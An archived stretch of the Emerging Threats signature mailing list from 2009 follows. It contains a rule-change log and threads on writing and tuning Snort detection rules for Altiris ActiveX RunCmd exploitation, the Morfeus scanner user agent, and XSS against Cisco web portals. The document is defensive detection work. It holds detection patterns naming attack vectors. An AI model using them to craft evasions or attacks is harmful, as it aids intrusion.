        2510385 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (193) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510386 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (194) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510387 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (194) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510388 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (195) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510389 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (195) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510390 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (196) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510391 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (196) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510392 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (197) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510393 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (197) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510394 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (198) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510395 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (198) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510396 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (199) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510397 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (199) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510398 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (200) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510399 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (200) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510400 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (201) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510401 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (201) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510402 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (202) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510403 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (202) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510404 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (203) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510405 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (203) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510406 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (204) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510407 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (204) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510408 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (205) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510409 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (205) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510410 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (206) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510411 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (206) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510412 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (207) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510413 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (207) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510414 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (208) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510415 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (208) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510416 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (209) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510417 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (209) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510418 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (210) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510419 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (210) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510420 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (211) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510421 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (211) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        20010455 || ET USER_AGENTS Suspicious UA string (MSIE7 an)

     -> Removed from emerging-sid-msg.map.txt (81):
        2500382 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (192) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500383 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (192) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500384 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (193) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500385 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (193) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500386 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (194) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500387 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (194) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500388 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (195) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500389 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (195) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500390 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (196) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500391 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (196) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500392 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (197) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500393 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (197) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500394 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (198) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500395 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (198) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500396 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (199) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500397 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (199) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500398 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (200) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500399 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (200) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500400 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (201) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500401 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (201) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500402 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (202) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500403 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (202) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500404 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (203) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500405 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (203) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500406 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (204) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500407 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (204) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500408 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (205) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500409 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (205) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500410 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (206) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500411 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (206) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500412 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (207) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500413 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (207) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500414 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (208) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500415 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (208) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500416 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (209) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500417 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (209) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500418 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (210) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500419 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (210) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500420 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (211) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500421 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (211) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510382 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (192) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510383 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (192) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510384 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (193) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510385 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (193) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510386 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (194) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510387 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (194) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510388 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (195) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510389 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (195) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510390 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (196) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510391 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (196) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510392 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (197) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510393 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (197) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510394 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (198) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510395 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (198) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510396 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (199) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510397 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (199) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510398 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (200) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510399 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (200) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510400 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (201) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510401 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (201) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510402 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (202) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510403 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (202) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510404 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (203) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510405 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (203) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510406 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (204) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510407 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (204) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510408 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (205) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510409 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (205) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510410 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (206) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510411 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (206) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510412 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (207) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510413 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (207) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510414 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (208) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510415 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (208) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510416 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (209) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510417 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (209) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510418 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (210) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510419 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (210) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510420 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (211) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510421 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (211) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        20010455 || ET USER_AGENTS Suspicious UA string (MSIE7 an)


From jonkman at jonkmans.com  Fri Dec 11 20:18:50 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Fri, 11 Dec 2009 20:18:50 -0500
Subject: [Emerging-Sigs] wooo I got the sig right
In-Reply-To: <e75cc74a0912111127j6f3d39f9pe20781f852e1eed9@mail.gmail.com>
References: <e75cc74a0912111127j6f3d39f9pe20781f852e1eed9@mail.gmail.com>
Message-ID: <4B22EF7A.7030008@jonkmans.com>

Congrats! It definitely is a good feeling when you catch something on a
sig you wrote yourself. Gets me out of bed in the morning! :)

Matt

On 12/11/09 2:27 PM, Kevin Ross wrote:
> I wrote a sig a few weeks ago for and Altiris server RunCmd
> vulnerability (see below). I was not 100% sure of its accuracy. Now an
> exploit module has been released for metasploit to take advantage of
> this vulnerability which you can see here
> http://www.metasploit.com/redmine/projects/framework/repository/revisions/7821
> and it turns out my sigs are right to provide coverage for this
> (especially as the organisation I work for uses Altiris, though of
> course it is weakened in it's coverage by obfuscation but it is better
> than no coverage).
> 
> It certainly brings home that being able to write your own sigs for an
> IDS/IPS is far better than a closed signature model you get with some
> vendors, relying on them like a baby at a mother's teat. Especially as
> the sig may never come unless you write it yourself (especially in the
> case of obscure technologies). Again and again I am glad to use Snort
> and all the effort that has gone into it's engine and sigs to make it a
> great tool for all networks.
> 
> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET WEB_CLIENT
> Possible Symantec Altiris Deployment Solution and Notification Server
> ActiveX Control RunCmd Arbitrary Code Execution Attempt";
> flow:established,to_client; content:"clsid"; nocase;
> content:"B44D252D-98FC-4D5C-948C-BE868392A004"; nocase; distance:0;
> content:"RunCmd"; nocase;
> pcre:"/<OBJECT\s+[^>]*classid\s*=\s*[\x22\x27]?\s*clsid\s*\x3a\s*\x7B?\s*B44D252D-98FC-4D5C-948C-BE868392A004/si";
> classtype:attempted-user;
> reference:url,securitytracker.com/alerts/2009/Nov/1023238.html
> <http://securitytracker.com/alerts/2009/Nov/1023238.html>;
> reference:url,www.securityfocus.com/bid/37092
> <http://www.securityfocus.com/bid/37092>; reference:cve,2009-3033;
> reference:url,doc.emergingthreats.net/2010369
> <http://doc.emergingthreats.net/2010369>;
> reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_CLIENT/WEB_Symantec
> <http://www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_CLIENT/WEB_Symantec>;
> sid:2010369; rev:2;)
> 
> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( msg:"ET
> WEB_CLIENT ACTIVEX Possible Symantec Altiris Deployment Solution and
> Notification Server ActiveX Control RunCmd Arbitrary Code Execution
> Function Call Attempt"; flow:to_client,established;
> content:"ActiveXObject"; nocase;
> content:"Altiris.AeXNSConsoleUtilities"; nocase; distance:0;
> content:"RunCmd"; nocase; classtype:attempted-user;
> reference:url,securitytracker.com/alerts/2009/Nov/1023238.html
> <http://securitytracker.com/alerts/2009/Nov/1023238.html>;
> reference:url,www.securityfocus.com/bid/37092
> <http://www.securityfocus.com/bid/37092>; reference:cve,2009-3033;
> reference:url,doc.emergingthreats.net/2010370
> <http://doc.emergingthreats.net/2010370>;
> reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_CLIENT/WEB_Symantec
> <http://www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_CLIENT/WEB_Symantec>;
> sid:2010370; rev:2;)
> 
> 
> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 

----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

From jonkman at jonkmans.com  Fri Dec 11 20:21:46 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Fri, 11 Dec 2009 20:21:46 -0500
Subject: [Emerging-Sigs] Morfeus F Scanner User-Agent
In-Reply-To: <4B229999.7060809@packetmail.net>
References: <6116b9e20912110934p70b01d6ex1a4bb300eae49a34@mail.gmail.com>
	<4B229999.7060809@packetmail.net>
Message-ID: <4B22F02A.7040200@jonkmans.com>

I agree. I try to put a leading 0d 0a on things like these but I miss
them once in a while. If anyone sees any others I've missed please let
me know.

Will fix these up.

Matt

On 12/11/09 2:12 PM, evilghost at packetmail.net wrote:
> Agree, perhaps we can review the user-agents and anchor, I found several 
> that are not anchored.  I don't see them false often (or even at all) so 
> we may be chasing panacea.
> 
> Mike Cox wrote:
>> I propose we anchor the User-Agent in SID 2006466.  Go from:
>>
>> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER PHP
>> Attack Tool Morfeus F Scanner"; flow:established,to_server;
>> content:"User-Agent|3a| Morfeus "; nocase; reference:url,
>> www.webmasterworld.com/search_engine_spiders/3227720.htm;
>> classtype:web-application-attack; reference:url,
>> doc.emergingthreats.net/2003466; reference:url,
>> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SERVER/WEB_Morfeus_Scan;
>> sid:2003466; rev:8;)
>>
>> To:
>>
>> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER PHP
>> Attack Tool Morfeus F Scanner"; flow:established,to_server;
>> content:"|0d 0a|User-Agent|3a|
>> Morfeus "; nocase; reference:url,
>> www.webmasterworld.com/search_engine_spiders/3227720.htm;
>> classtype:web-application-attack; reference:url,
>> doc.emergingthreats.net/2003466; reference:url,
>> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SERVER/WEB_Morfeus_Scan;
>> sid:2003466; rev:9;)
>>
>> Can also do the same to 20097899 like so:
>>
>> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER PHP
>> Attack Tool Morfeus F Scanner - M"; flow:established,to_server; content:"|0d
>> 0a|User-Agent|3a| M Fucking Scanner"; nocase; reference:url,
>> www.webmasterworld.com/search_engine_spiders/3227720.htm;
>> classtype:web-application-attack; reference:url,
>> doc.emergingthreats.net/2003466; reference:url,
>> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SERVER/WEB_Morfeus_Scan;
>> sid:2009799; rev:4;)
>>
>>
>> Mike Cox
>>
>>   
>> ------------------------------------------------------------------------
>>
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>   
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 

----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

From jonkman at jonkmans.com  Fri Dec 11 21:24:56 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Fri, 11 Dec 2009 21:24:56 -0500
Subject: [Emerging-Sigs] 2 Cisco Sigs
In-Reply-To: <4B21647F.2060703@packetmail.net>
References: <e75cc74a0912101240r4a2f8709vb9549ddb76c9b329@mail.gmail.com>	<4312B0FE-AE04-46BE-94C4-302FC227DA0C@jonkmans.com>	<4B216151.400@packetmail.net>
	<4B21647F.2060703@packetmail.net>
Message-ID: <4B22FEF8.8000008@jonkmans.com>

Tweak completed. Lets see how it goes...

On 12/10/09 4:13 PM, evilghost at packetmail.net wrote:
> Adjusted PCRE, I like this one better:
> 
> pcre:"/(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange)/Ui";
> 
> 
> 
> evilghost at packetmail.net wrote:
>> Matt, since we're detecting XSS I'd like to modify the signatures PCRE 
>> (proposed earlier in the year) for these XSS sigs to catch all of the 
>> DOM behaviors.  I could go back and modify all of Kevin's sigs and get a 
>> huge COMBO-BREAKER and integer overflow the ET scoreboard.  I'll just 
>> submit these two and if you agree, perhaps you can go back against the 
>> XSS signs and sed in this new PCRE?
>>
>> See 
>> http://lists.emergingthreats.net/pipermail/emerging-sigs/2009-November/004539.html 
>> for the discussion.  I don't think matching on "src" or "img" in the 
>> PCRE URI buffer is wise since it should be covered by the other DOM 
>> event handlers.
>>
>> pcre:"/(script|onmouse.+|onkey.+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange)/Ui";
>>
>>
>> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER Cisco Adaptive Security Appliance WebVPN Cross Site Scripting Attempt"; 
>> flow:established,to_server; content:"POST|20 2F 2B|webvpn|2B 2F|index|2E|html|20|HTTP|2F|"; depth:31; 
>> nocase; content:"Host|3A|"; within:20; 
>> pcre:"/(script|onmouse.+|onkey.+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange)/Ui";
>> classtype:attempted-user; reference:url,www.securityfocus.com/bid/34307/info; reference:url,tools.cisco.com/security/center/viewAlert.x?alertId=17950; 
>> reference:cve,2009-1220; sid:14000001; rev:1;)
>>
>> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER Cisco BBSM Captive Portal AccesCodeStart.asp Cross-Site Scripting Attempt"; 
>> flow:established,to_server; uricontent:"|2F|ekgnkm|2F|AccessCodeStart|2E|asp"; nocase; 
>> pcre:"/(script|onmouse.+|onkey.+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange)/Ui";
>> classtype:attempted-user; reference:url,www.securityfocus.com/bid/29191/info; reference:cve,2008-2165; sid:14000002; rev:1;)
>>
>> - evilghost
>>
>> Matt Jonkman wrote:
>>   
>>> Posted, thanks Kevin!!
>>>
>>> Matt
>>>
>>> On Dec 10, 2009, at 3:40 PM, Kevin Ross wrote:
>>>
>>>   
>>>     
>>>> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER Cisco Adaptive Security Appliance WebVPN Cross Site Scripting Attempt"; flow:established,to_server; content:"POST|20 2F 2B|webvpn|2B 2F|index|2E|html|20|HTTP|2F|"; depth:31; nocase; content:"Host|3A|"; within:20; pcre:"/(script|img|src|alert|onmouse|onkey|onload|ondragdrop|onblur|onfocus|onclick)/Ui"; classtype:attempted-user; reference:url,www.securityfocus.com/bid/34307/info; reference:url,tools.cisco.com/security/center/viewAlert.x?alertId=17950; reference:cve,2009-1220; sid:14000001; rev:1;)
>>>>
>>>> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER Cisco BBSM Captive Portal AccesCodeStart.asp Cross-Site Scripting Attempt"; flow:established,to_server; uricontent:"|2F|ekgnkm|2F|AccessCodeStart|2E|asp"; nocase; pcre:"/(script|img|src|alert|onmouse|onkey|onload|ondragdrop|onblur|onfocus|onclick)/Ui"; classtype:attempted-user; reference:url,www.securityfocus.com/bid/29191/info; reference:cve,2008-2165; sid:14000002; rev:1;)
>>>>     
>>>>       
>>> ----------------------------------------------------
>>> Matthew Jonkman
>>> Emerging Threats
>>> Open Information Security Foundation (OISF)
>>> Phone 765-429-0398
>>> Fax 312-264-0205
>>> http://www.emergingthreats.net
>>> http://www.openinformationsecurityfoundation.org
>>> ----------------------------------------------------
>>>
>>> PGP: http://www.jonkmans.com/mattjonkman.asc
>>>
>>>
>>>
>>> _______________________________________________
>>> Emerging-sigs mailing list
>>> Emerging-sigs at emergingthreats.net
>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>>
>>>   
>>>     
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
>>   
> _______________________________________________
> Emerging-sigs mailing list
